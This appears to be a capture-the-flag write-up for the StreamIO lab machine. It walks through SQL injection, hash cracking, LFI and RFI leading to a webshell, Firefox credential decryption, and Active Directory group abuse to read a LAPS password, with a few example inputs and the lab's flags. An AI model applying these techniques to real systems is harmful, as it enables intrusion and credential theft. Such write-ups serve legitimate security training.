Last updated
Last updated
StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we found Firefox profile contains database which can extract saved credentials from it. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account, we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.
Scope
IP Address: 10.10.11.158
Nmap Scan
Before I start enumeration process, I will update /etc/hosts
with the info from Nmap script output
DNS Enumeration
I tried zone transfer but failed
RPC & SMB Enumeration
I got access denied when enumerating the two services
KERBEROS Enumeration
Then, I attempted to enumerate username looking for possible path but also nothing found
HTTP & HTTPS enumeration
http://10.10.11.158
https://10.10.11.158
I tried fuzzing subdomains, but nothing found, however when I tried subdomain fuzzing against https
protocol, I got a hit
https://watch.streamIO.htb
I looked at Wappalyzer
to see what technology being used and PHP
took my attention as it's not common to run php
on IIS,
So I attempted directory fuzzing against https://watch.streamIO.htb
Also, attempt php files fuzzing on https://steamIO.htb
https://streamIO.htb/login.php
I don't have any credentials, So I will return if obtained one.
https://watch.streamIO.htb/search.php
It's a search function that searches of film name in specific table which can be considered as database, and we can attempt sql injection.
When I delivered a simple payload, I get blocked by some security defences in place
blocked.php
So, I can't use SQLMap
and I will continue manually.
Something interesting took my attention here. when I type a word like man
it matched it from both side.
It returns Batman
, Anger Management
so it uses wildcard such as *Search*
.
The SQL Command maybe like this
I can break the code with something like that input';--
I was right and when I typed man';--
It matches only wildcard from right side as we already escape the left side
Let's Create our exploit, I tried union 1,2,...
until I got a hit at union 1,2,3,4,5,6
Field 2
is got triggered So I will inject command on it
So, we're dealing with MSSQL
database, we can use command from this cheat sheet:
Get the use name:
Current Database:
We're on MSSQL database, So one common attack vector is that we can get the hash on current use by executing the following command. I did it but failed as I got the machine account hash and couldn't be cracked
Continue to explore the database
We're already in STREAMIO
, Let's explore the tables
When I provided an asterisk *
it didn't return anything but when I provide username
it returned list of usernames
when I provide password,
it returned list of hashes, but I can't copy and paste them one by one, it's a waste of time
I looked at burp to see the HTML tag that the hashes is included in
So, I will use curl
command to get a list of hashes and filter the results
I will do the same thing with usernames
The username list is big for brute forcing so I will try to know who is really has account on the machine by enumerating Kerberos
I got a user's list and hashes list, Let's attempt to crack the hashed and then try brute forcing.
First, Start hashcat
in auto-detection mode the know the type of hash
Not all the hash cracked but we will be fine with what we found
Creating passwords list for brute forcing
Unfortunately, I didn't get a hit when I tried brute forcing
I remember the login.php
page that I left behind as I didn't have any credentials.
Intercept the request and send it to intruder
and then start the attack with passwords we have
Fuzzing for '/admin' directory and parameters
https://streamio.htb/admin/master.php
There is a missing parameter or something, Let's try parameter fuzzing
https://streamio.htb/admin/?debug=
I tried LFI
in this parameter and I got a hit https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts
I will use this vulnerability to read the content of master.php
using php wrapper
The file is check it has to be included
Looking at the end of code, It takes the input in parameter include
in POST request.
I will include master.php
from https://streamio.htb/admin/?debug=
and append inlcude
parameter to the POST request to meet the conditions.
We have found LFI
before but RFI
didn't work on Debug=
parameter, So I will try RFI
on include
parameter
we got a hit, Let's create a webshell for us.
I looked around, found login.php
and decided to explore its content
I searched for other passwords that maybe exists and find one
It's a password for mssql database
Let's examine the db
with SQLCMD
tool
shorten our users list by ensuring that the username already exists
Only one hash was cracked, So it must be for one of the two users
Confirm
User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx
I found that the system has Mozilla Firefox
installed, So I looked at the user Mozilla profile and I copied it to my kali machine to try decrypt the Firefox secrets and cookies
Start SMB Server
I change directory the folder I copied from windows box and start firepwd.py
to decrypt Firefox secrets.
I found some credentials let's try them on brute forcing account
I fired up bloodhound to see what the user JDgodd
can do and file the following:
JDgodd
Can writeOwner
on CORE STAFF
group which enable use to add ourselves in that group
CORE STAFF
group has the rights to read LAPS
password on the DC
machine
Let's list the command we will use for that purpose:
I personally use crackmapexec
to pull the laps
Alternative way from the community using ldapsearch
Root Flag: fcca05f1388d18d964521ce53582793